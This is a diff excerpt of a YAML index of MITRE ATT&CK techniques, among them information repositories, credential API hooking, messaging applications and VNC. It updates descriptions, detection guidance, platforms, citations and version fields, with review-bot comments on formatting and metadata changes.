- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
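Review bot: two content changes in this hunk are real edits rather than regeneration noise and should be called out in the PR description: the T1213 description is substantially expanded (CRM databases, Slack and Microsoft Teams, improperly secured cloud-hosted repositories with three new citations), and the single contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` becomes two entries with the Gurucul affiliation now attached only to the second name, with `Obsidian Security` added as well. The double-quoted description scalar also keeps trailing spaces before several `\n` sequences (`(PII) \n\n`, `databases \n*`, `Teams \n\n`), which survive into the rendered text; harmless, but it comes from the upstream export, so do not hand-fix it here or the next regeneration will reintroduce the diff.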
@@ -41044,10 +41652,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
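Review bot: The platform list replaces `Office 365` and `Google Workspace` with the single value `Office Suite` while bumping `x_mitre_version` from 3.3 to 3.4; any index, filter or test selector keyed on the old platform names must be regenerated in the same change, otherwise this technique silently drops out of those views.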
@@ -41060,10 +41667,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -41072,11 +41689,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
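Review bot: The new Cybernews reference has a stray space before the period in `description: Vilius Petkauskas . (2022, November 3)`; it should read `Vilius Petkauskas. (2022, November 3)`. This hunk also starts the pattern, repeated for every technique in the patch, of dropping `spec_version: '2.1'` without a replacement; if any consumer of this file reads that field, it needs updating alongside this change, otherwise the removal is fine.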
@@ -41113,7 +41733,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
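Review bot: The `modified` timestamp for T1602.001 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-10-22T01:54:22.812Z`; a regenerated object should not carry an older modification time than the one it replaces, so confirm the upstream bundle this was generated from is the current one and not a stale snapshot.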
@@ -41145,115 +41765,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
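Review bot: The rewritten T1056.004 entry drops `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) with no replacement field, and T1602.001 at the top of the hunk loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` without the `3.2.0` value the other entries in this patch receive; confirm both omissions come from upstream rather than from a merge artifact. In the new T1213.005 entry, the description opens with an escaped trailing space (`\ \n\n`) and the Sentinel Labs reference starts with a leading space (`" Jim Walter."`); both parse fine but render as stray whitespace, and `x_mitre_detection: ''` is empty, so a consumer that expects detection guidance for every technique should tolerate the empty string.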
@@ -41264,6 +41951,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -41273,7 +41961,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -41289,66 +41976,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
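Review bot: The `external_references` block for T1021.005 is a pure permutation of the existing entries except for two real changes in `Havana authentication bug` (the URL scheme moves from `http://` to `https://` and the retrieved date from October 6, 2021 to September 12, 2024), yet the reorder produces roughly sixty lines of churn; if the generator sorted references deterministically (for example by `source_name`) the meaningful diff would be three lines and easier to review.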
@@ -41373,11 +42061,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
@@ -41400,9 +42088,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -41453,7 +42140,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
@@ -41517,7 +42203,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
